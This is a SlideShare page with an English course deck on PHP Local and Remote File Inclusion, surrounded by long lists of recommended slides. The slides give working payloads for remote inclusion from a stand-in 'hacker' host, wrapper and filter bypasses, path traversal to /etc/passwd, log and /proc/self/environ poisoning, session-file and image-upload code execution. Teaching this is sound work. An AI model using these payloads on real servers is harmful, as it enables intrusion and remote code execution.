SlideShare una empresa de Scribd logo

LFI

Михаил Фирстов
Михаил Фирстов

Part of course.

Educación
1 de 19
Descargar para leer sin conexión
LFI/RFI Local/Remote File Inclusion
WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php index.php <?php echo "123"; help.php User can set file with code, which will be included (executed or just printed out)
WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php <?php echo "123"; index.php help.php User can set file with code, which will be included (executed or just printed out)
WTF is LFI/RFI? <?php include $_GET['page']; ?> 123 User can set file with code, which will be included (executed or just printed out) <?php echo "123"; index.php help.php
PHP functions • include • include_once • require • require_once
So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php 123123 <?php echo "123123"; ... shell.txt
LFI or RFI? Path in function before user's input? include('/tmp/'.$file) or include($file.'.php') Allow_url_fopen False True Allow_url_include False True RFILFI
RFI exploitation Simple, via site with your code ... include $_GET['url'].'.txt'; ... index.php /url=http://hacker/shell <?php system('uname -a'); ... shell.txt Linux ...
RFI exploitation Using wrappers (see SSRF) ... include $_GET['url'].'.txt'; ... index.php /url=data:,<?php system('id'); ?># id=1001 (www-data)... Slice path with "#" or "?" or use data:text/plain;base64,PD9wa..
RFI exploitation Protocol filter bypass using wrappers ... if (substr($_GET['url'], 0, 4) != 'http') { include $_GET['url']; } index.php /url=zlib:http://site/shell.php id=1001 (www-data)...
RFI exploitation Read files via php:// wrapper ... include $_GET['file']; ... index.php ?file=php://filter/ convert.base64-encode/ resource=index.php PD9waHA... base64("<?php...
LFI exploitation Require any local file ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=../../etc/passwd%00 Null byte work only with magic_quotes_gpc=off Try to use slashes technique ///[~4096]///.php (old php version)
LFI exploitation Upload file (probably image) with php-code and require it! ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=./uploads/images/1.jpg%00 Insert php code in EXIF tags or use PNG IDAT chunks technique ... <?php system('id'); ?> ... 1.jpg
LFI exploitation Find log file and insert your code via special crafted request ... include '/var/www/'.$_GET['file']; ... index.php ?file=../../../var/log/ apache2/access.log Many apps has log files with user's data from incoming requests, mail for example 1.4.7.7 - - [28/Mar/2016:10:22:04 -0300] "GET /?a=<?=@`$c`?> HTTP/1.0" 200 access.log ?a=<?@`$c`?>
LFI exploitation use ProcFS features ... include '/var/www/'.$_GET['file']; ... index.php /proc/self/fd/[0-9] apache log files located at 2 and 7 ... USER_AGENT=<?php system('id'); ?> ... environ ?file=../../proc/slef/environ%00 ... User-Agent: <?php system('id'); ?>
LFI exploitation Use session files ... $_SESSION['var'] = $_GET['var']; include '/var/www/'.$_GET['file']; ... index.php ?var=<?php phpinfo(); ? >&file=../../tmp/ sess_blablablabla blablablabla - PHPSESSID value
LFI exploitation phpinfo trick ... include '/var/www/'.$_GET['file']; ... index.php ... phpinfo(); ... i.php 1. Send $_FILE with shell.php 2. Parse temp filename, without closing socket 3. include file using temp file name

Recomendados

LFI to RCE
LFI to RCELFI to RCE
LFI to RCEn|u - The Open Security Community
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web HackerМихаил Фирстов
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksImperva
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Imperva
 
LFI to RCE Exploit with Perl Script
LFI to RCE Exploit with Perl ScriptLFI to RCE Exploit with Perl Script
LFI to RCE Exploit with Perl ScriptPrathan Phongthiproek
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
File inclusion
File inclusionFile inclusion
File inclusionAaftabKhan14
 

Recomendados

LFI to RCE
LFI to RCELFI to RCE
LFI to RCEn|u - The Open Security Community
 
Hacking routers as Web Hacker
Hacking routers as Web HackerHacking routers as Web Hacker
Hacking routers as Web HackerМихаил Фирстов
 
How to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksHow to Prevent RFI and LFI Attacks
How to Prevent RFI and LFI AttacksImperva
 
Local File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code ExecutionLocal File Inclusion to Remote Code Execution
Local File Inclusion to Remote Code Executionn|u - The Open Security Community
 
Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Remote File Inclusion (RFI) Vulnerabilities 101
Remote File Inclusion (RFI) Vulnerabilities 101Imperva
 
LFI to RCE Exploit with Perl Script
LFI to RCE Exploit with Perl ScriptLFI to RCE Exploit with Perl Script
LFI to RCE Exploit with Perl ScriptPrathan Phongthiproek
 
Directory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksDirectory Traversal & File Inclusion Attacks
Directory Traversal & File Inclusion AttacksRaghav Bisht
 
File inclusion
File inclusionFile inclusion
File inclusionAaftabKhan14
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php PresentationAlan Pinstein
 
PHP in one presentation
PHP in one presentationPHP in one presentation
PHP in one presentationMilad Rahimi
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Php
PhpPhp
Phpanandha ganesh
 
PHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksPHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksRoyston Olivera
 
Php technical presentation
Php technical presentationPhp technical presentation
Php technical presentationdharmendra kumar dhakar
 
Php Presentation
Php PresentationPhp Presentation
Php PresentationManish Bothra
 
PHP
PHPPHP
PHPMomentum Design Lab
 
01 Php Introduction
01 Php Introduction01 Php Introduction
01 Php IntroductionGeshan Manandhar
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHPCollaboration Technologies
 
php
phpphp
phpajeetjhajharia
 
Introduction To PHP
Introduction To PHPIntroduction To PHP
Introduction To PHPShweta A
 
A History of PHP
A History of PHPA History of PHP
A History of PHPXinchen Hui
 
Lfi
LfiLfi
Lfipenetration Tester
 
PHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP FundamentalsPHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP FundamentalsVibrant Technologies & Computers
 
Introduction to php web programming - get and post
Introduction to php web programming - get and postIntroduction to php web programming - get and post
Introduction to php web programming - get and postbaabtra.com - No. 1 supplier of quality freshers
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHPBradley Holt
 
PHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersPHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersMohammed Mushtaq Ahmed
 
Introduction to php
Introduction to phpIntroduction to php
Introduction to phpTaha Malampatti
 
Client side
Client sideClient side
Client sideМихаил Фирстов
 
Sql-Injection
Sql-InjectionSql-Injection
Sql-InjectionМихаил Фирстов
 

Más contenido relacionado

La actualidad más candente

Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Ismail Tasdelen
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php PresentationAlan Pinstein
 
PHP in one presentation
PHP in one presentationPHP in one presentation
PHP in one presentationMilad Rahimi
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
PHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksPHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksRoyston Olivera
 
Introduction To PHP
Introduction To PHPIntroduction To PHP
Introduction To PHPShweta A
 
A History of PHP
A History of PHPA History of PHP
A History of PHPXinchen Hui
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHPBradley Holt
 
PHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersPHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersMohammed Mushtaq Ahmed
 

La actualidad más candente (20)

Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php Presentation
 
PHP in one presentation
PHP in one presentationPHP in one presentation
PHP in one presentation
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
Php
PhpPhp
Php
 
PHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and FrameworksPHP - History, Introduction, Summary, Extensions and Frameworks
PHP - History, Introduction, Summary, Extensions and Frameworks
 
Php technical presentation
Php technical presentationPhp technical presentation
Php technical presentation
 
Php Presentation
Php PresentationPhp Presentation
Php Presentation
 
PHP
PHPPHP
PHP
 
01 Php Introduction
01 Php Introduction01 Php Introduction
01 Php Introduction
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHP
 
php
phpphp
php
 
Introduction To PHP
Introduction To PHPIntroduction To PHP
Introduction To PHP
 
A History of PHP
A History of PHPA History of PHP
A History of PHP
 
Lfi
LfiLfi
Lfi
 
PHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP FundamentalsPHP - Introduction to PHP Fundamentals
PHP - Introduction to PHP Fundamentals
 
Introduction to php web programming - get and post
Introduction to php web programming - get and postIntroduction to php web programming - get and post
Introduction to php web programming - get and post
 
Introduction to PHP
Introduction to PHPIntroduction to PHP
Introduction to PHP
 
PHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginnersPHP complete reference with database concepts for beginners
PHP complete reference with database concepts for beginners
 
Introduction to php
Introduction to phpIntroduction to php
Introduction to php
 

Destacado

Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Jacqueline Vickery
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow
 
Sunny on Foody
Sunny on FoodySunny on Foody
Sunny on Foodymrp4
 
Le piattaforme per il social business
Le piattaforme per il social businessLe piattaforme per il social business
Le piattaforme per il social businesspiero itta
 
Cyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyCyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyLeandro Rangel
 
Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Ansgar Jahns
 
Intestazione
IntestazioneIntestazione
Intestazionerifugiati
 
Wordpress Security Optimization (Basic)
Wordpress Security Optimization (Basic)Wordpress Security Optimization (Basic)
Wordpress Security Optimization (Basic)Irvan R-ID
 
L1 seeingthings
L1 seeingthingsL1 seeingthings
L1 seeingthingsBoat Dock
 
parameter tampering
parameter tamperingparameter tampering
parameter tamperingIlsun Choi
 
Domanda protocollata
Domanda protocollataDomanda protocollata
Domanda protocollatanoicattaroweb
 

Destacado (20)

Client side
Client sideClient side
Client side
 
Sql-Injection
Sql-InjectionSql-Injection
Sql-Injection
 
Race condition
Race conditionRace condition
Race condition
 
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
Digital Media & Learning Conference Talk: Kids Teaching Kids Web Design at a ...
 
Race condition
Race conditionRace condition
Race condition
 
Attacking MongoDB
Attacking MongoDBAttacking MongoDB
Attacking MongoDB
 
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
Defcon Moscow #0x0A - Mikhail Firstov "Hacking routers as Web Hacker"
 
Mongo db eng
Mongo db engMongo db eng
Mongo db eng
 
Sunny on Foody
Sunny on FoodySunny on Foody
Sunny on Foody
 
Le piattaforme per il social business
Le piattaforme per il social businessLe piattaforme per il social business
Le piattaforme per il social business
 
Cyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.JoyCyberfolio 2007 - Lean.Joy
Cyberfolio 2007 - Lean.Joy
 
Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021Prezi #hotelvertrieb#ecommerce#SEO_2021
Prezi #hotelvertrieb#ecommerce#SEO_2021
 
Intestazione
IntestazioneIntestazione
Intestazione
 
PHP
PHPPHP
PHP
 
Wordpress Security Optimization (Basic)
Wordpress Security Optimization (Basic)Wordpress Security Optimization (Basic)
Wordpress Security Optimization (Basic)
 
L1 seeingthings
L1 seeingthingsL1 seeingthings
L1 seeingthings
 
parameter tampering
parameter tamperingparameter tampering
parameter tampering
 
Quick Wins
Quick WinsQuick Wins
Quick Wins
 
Domanda protocollata
Domanda protocollataDomanda protocollata
Domanda protocollata
 
M Power
M PowerM Power
M Power
 

Similar a LFI

Php mysql training-in-mumbai
Php mysql training-in-mumbaiPhp mysql training-in-mumbai
Php mysql training-in-mumbaiUnmesh Baile
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application HackingRaghav Bisht
 
Introducation to php for beginners
Introducation to php for beginners Introducation to php for beginners
Introducation to php for beginners musrath mohammad
 
Php mysql training-in-mumbai
Php mysql training-in-mumbaiPhp mysql training-in-mumbai
Php mysql training-in-mumbaivibrantuser
 
PHP Without PHP—Confoo
PHP Without PHP—ConfooPHP Without PHP—Confoo
PHP Without PHP—Confooterry chay
 
Zephir - A Wind of Change for writing PHP extensions
Zephir - A Wind of Change for writing PHP extensionsZephir - A Wind of Change for writing PHP extensions
Zephir - A Wind of Change for writing PHP extensionsMark Baker
 
GettingStartedWithPHP
GettingStartedWithPHPGettingStartedWithPHP
GettingStartedWithPHPNat Weerawan
 
Living With Legacy Code
Living With Legacy CodeLiving With Legacy Code
Living With Legacy CodeRowan Merewood
 
3. build your own php extension ai ti aptech
3. build your own php extension ai ti aptech3. build your own php extension ai ti aptech
3. build your own php extension ai ti aptechQuang Anh Le
 
07 build your-own_php_extension
07 build your-own_php_extension07 build your-own_php_extension
07 build your-own_php_extensionNguyen Duc Phu
 
Build your own PHP extension
Build your own PHP extensionBuild your own PHP extension
Build your own PHP extensionVõ Duy Tuấn
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 

Similar a LFI (20)

Php with my sql
Php with my sqlPhp with my sql
Php with my sql
 
Php mysql training-in-mumbai
Php mysql training-in-mumbaiPhp mysql training-in-mumbai
Php mysql training-in-mumbai
 
Key features PHP 5.3 - 5.6
Key features PHP 5.3 - 5.6Key features PHP 5.3 - 5.6
Key features PHP 5.3 - 5.6
 
Php mysql ppt
Php mysql pptPhp mysql ppt
Php mysql ppt
 
Web-servers & Application Hacking
Web-servers & Application HackingWeb-servers & Application Hacking
Web-servers & Application Hacking
 
Introducation to php for beginners
Introducation to php for beginners Introducation to php for beginners
Introducation to php for beginners
 
Php mysql training-in-mumbai
Php mysql training-in-mumbaiPhp mysql training-in-mumbai
Php mysql training-in-mumbai
 
Php mysql
Php mysqlPhp mysql
Php mysql
 
Php Tutorial
Php TutorialPhp Tutorial
Php Tutorial
 
PHP Without PHP—Confoo
PHP Without PHP—ConfooPHP Without PHP—Confoo
PHP Without PHP—Confoo
 
Zephir - A Wind of Change for writing PHP extensions
Zephir - A Wind of Change for writing PHP extensionsZephir - A Wind of Change for writing PHP extensions
Zephir - A Wind of Change for writing PHP extensions
 
GettingStartedWithPHP
GettingStartedWithPHPGettingStartedWithPHP
GettingStartedWithPHP
 
Hacking with hhvm
Hacking with hhvmHacking with hhvm
Hacking with hhvm
 
Living With Legacy Code
Living With Legacy CodeLiving With Legacy Code
Living With Legacy Code
 
3. build your own php extension ai ti aptech
3. build your own php extension ai ti aptech3. build your own php extension ai ti aptech
3. build your own php extension ai ti aptech
 
07 build your-own_php_extension
07 build your-own_php_extension07 build your-own_php_extension
07 build your-own_php_extension
 
Build your own PHP extension
Build your own PHP extensionBuild your own PHP extension
Build your own PHP extension
 
PHP
PHPPHP
PHP
 
Php mysql
Php mysqlPhp mysql
Php mysql
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧
 

Último

Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxDenish Jangid
 
SOC 101 Demonstration of Learning Presentation
SOC 101 Demonstration of Learning PresentationSOC 101 Demonstration of Learning Presentation
SOC 101 Demonstration of Learning Presentationcamerronhm
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsMebane Rash
 
Single or Multiple melodic lines structure
Single or Multiple melodic lines structureSingle or Multiple melodic lines structure
Single or Multiple melodic lines structuredhanjurrannsibayan2
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfPoh-Sun Goh
 
Sociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning ExhibitSociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning Exhibitjbellavia9
 
ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.MaryamAhmad92
 
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Pooja Bhuva
 
COMMUNICATING NEGATIVE NEWS - APPROACHES .pptx
COMMUNICATING NEGATIVE NEWS - APPROACHES .pptxCOMMUNICATING NEGATIVE NEWS - APPROACHES .pptx
COMMUNICATING NEGATIVE NEWS - APPROACHES .pptxannathomasp01
 
How to setup Pycharm environment for Odoo 17.pptx
How to setup Pycharm environment for Odoo 17.pptxHow to setup Pycharm environment for Odoo 17.pptx
How to setup Pycharm environment for Odoo 17.pptxCeline George
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfagholdier
 
Google Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptxGoogle Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptxDr. Sarita Anand
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...Poonam Aher Patil
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.pptRamjanShidvankar
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17Celine George
 
Python Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxPython Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxRamakrishna Reddy Bijjam
 
Plant propagation: Sexual and Asexual propapagation.pptx
Plant propagation: Sexual and Asexual propapagation.pptxPlant propagation: Sexual and Asexual propapagation.pptx
Plant propagation: Sexual and Asexual propapagation.pptxUmeshTimilsina1
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and ModificationsMJDuyan
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxAreebaZafar22
 
Fostering Friendships - Enhancing Social Bonds in the Classroom
Fostering Friendships - Enhancing Social Bonds in the ClassroomFostering Friendships - Enhancing Social Bonds in the Classroom
Fostering Friendships - Enhancing Social Bonds in the ClassroomPooky Knightsmith
 

Último (20)

Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptxBasic Civil Engineering first year Notes- Chapter 4 Building.pptx
Basic Civil Engineering first year Notes- Chapter 4 Building.pptx
 
SOC 101 Demonstration of Learning Presentation
SOC 101 Demonstration of Learning PresentationSOC 101 Demonstration of Learning Presentation
SOC 101 Demonstration of Learning Presentation
 
On National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan FellowsOn National Teacher Day, meet the 2024-25 Kenan Fellows
On National Teacher Day, meet the 2024-25 Kenan Fellows
 
Single or Multiple melodic lines structure
Single or Multiple melodic lines structureSingle or Multiple melodic lines structure
Single or Multiple melodic lines structure
 
Micro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdfMicro-Scholarship, What it is, How can it help me.pdf
Micro-Scholarship, What it is, How can it help me.pdf
 
Sociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning ExhibitSociology 101 Demonstration of Learning Exhibit
Sociology 101 Demonstration of Learning Exhibit
 
ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.ICT role in 21st century education and it's challenges.
ICT role in 21st century education and it's challenges.
 
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
Sensory_Experience_and_Emotional_Resonance_in_Gabriel_Okaras_The_Piano_and_Th...
 
COMMUNICATING NEGATIVE NEWS - APPROACHES .pptx
COMMUNICATING NEGATIVE NEWS - APPROACHES .pptxCOMMUNICATING NEGATIVE NEWS - APPROACHES .pptx
COMMUNICATING NEGATIVE NEWS - APPROACHES .pptx
 
How to setup Pycharm environment for Odoo 17.pptx
How to setup Pycharm environment for Odoo 17.pptxHow to setup Pycharm environment for Odoo 17.pptx
How to setup Pycharm environment for Odoo 17.pptx
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
Google Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptxGoogle Gemini An AI Revolution in Education.pptx
Google Gemini An AI Revolution in Education.pptx
 
General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...General Principles of Intellectual Property: Concepts of Intellectual Proper...
General Principles of Intellectual Property: Concepts of Intellectual Proper...
 
Application orientated numerical on hev.ppt
Application orientated numerical on hev.pptApplication orientated numerical on hev.ppt
Application orientated numerical on hev.ppt
 
How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17How to Create and Manage Wizard in Odoo 17
How to Create and Manage Wizard in Odoo 17
 
Python Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docxPython Notes for mca i year students osmania university.docx
Python Notes for mca i year students osmania university.docx
 
Plant propagation: Sexual and Asexual propapagation.pptx
Plant propagation: Sexual and Asexual propapagation.pptxPlant propagation: Sexual and Asexual propapagation.pptx
Plant propagation: Sexual and Asexual propapagation.pptx
 
Understanding Accommodations and Modifications
Understanding Accommodations and ModificationsUnderstanding Accommodations and Modifications
Understanding Accommodations and Modifications
 
ICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptxICT Role in 21st Century Education & its Challenges.pptx
ICT Role in 21st Century Education & its Challenges.pptx
 
Fostering Friendships - Enhancing Social Bonds in the Classroom
Fostering Friendships - Enhancing Social Bonds in the ClassroomFostering Friendships - Enhancing Social Bonds in the Classroom
Fostering Friendships - Enhancing Social Bonds in the Classroom
 

LFI

  • 2. WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php index.php <?php echo "123"; help.php User can set file with code, which will be included (executed or just printed out)
  • 3. WTF is LFI/RFI? <?php include $_GET['page']; ?> GET /page=help.php <?php echo "123"; index.php help.php User can set file with code, which will be included (executed or just printed out)
  • 4. WTF is LFI/RFI? <?php include $_GET['page']; ?> 123 User can set file with code, which will be included (executed or just printed out) <?php echo "123"; index.php help.php
  • 5. PHP functions • include • include_once • require • require_once
  • 6. So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
  • 7. So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php /url=http://hacker/shell.txt <?php echo "123123"; ... shell.txt
  • 8. So, RFI? With RFI you can set any URL instead of local path to file. Code from url will be executed. ... include $_GET['url']; ... index.php 123123 <?php echo "123123"; ... shell.txt
  • 9. LFI or RFI? Path in function before user's input? include('/tmp/'.$file) or include($file.'.php') Allow_url_fopen False True Allow_url_include False True RFILFI
  • 10. RFI exploitation Simple, via site with your code ... include $_GET['url'].'.txt'; ... index.php /url=http://hacker/shell <?php system('uname -a'); ... shell.txt Linux ...
  • 11. RFI exploitation Using wrappers (see SSRF) ... include $_GET['url'].'.txt'; ... index.php /url=data:,<?php system('id'); ?># id=1001 (www-data)... Slice path with "#" or "?" or use data:text/plain;base64,PD9wa..
  • 12. RFI exploitation Protocol filter bypass using wrappers ... if (substr($_GET['url'], 0, 4) != 'http') { include $_GET['url']; } index.php /url=zlib:http://site/shell.php id=1001 (www-data)...
  • 13. RFI exploitation Read files via php:// wrapper ... include $_GET['file']; ... index.php ?file=php://filter/ convert.base64-encode/ resource=index.php PD9waHA... base64("<?php...
  • 14. LFI exploitation Require any local file ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=../../etc/passwd%00 Null byte work only with magic_quotes_gpc=off Try to use slashes technique ///[~4096]///.php (old php version)
  • 15. LFI exploitation Upload file (probably image) with php-code and require it! ... include '/var/www/'.$_GET['file'].'.php'; ... index.php ?file=./uploads/images/1.jpg%00 Insert php code in EXIF tags or use PNG IDAT chunks technique ... <?php system('id'); ?> ... 1.jpg
  • 16. LFI exploitation Find log file and insert your code via special crafted request ... include '/var/www/'.$_GET['file']; ... index.php ?file=../../../var/log/ apache2/access.log Many apps has log files with user's data from incoming requests, mail for example 1.4.7.7 - - [28/Mar/2016:10:22:04 -0300] "GET /?a=<?=@`$c`?> HTTP/1.0" 200 access.log ?a=<?@`$c`?>
  • 17. LFI exploitation use ProcFS features ... include '/var/www/'.$_GET['file']; ... index.php /proc/self/fd/[0-9] apache log files located at 2 and 7 ... USER_AGENT=<?php system('id'); ?> ... environ ?file=../../proc/slef/environ%00 ... User-Agent: <?php system('id'); ?>
  • 18. LFI exploitation Use session files ... $_SESSION['var'] = $_GET['var']; include '/var/www/'.$_GET['file']; ... index.php ?var=<?php phpinfo(); ? >&file=../../tmp/ sess_blablablabla blablablabla - PHPSESSID value
  • 19. LFI exploitation phpinfo trick ... include '/var/www/'.$_GET['file']; ... index.php ... phpinfo(); ... i.php 1. Send $_FILE with shell.php 2. Parse temp filename, without closing socket 3. include file using temp file name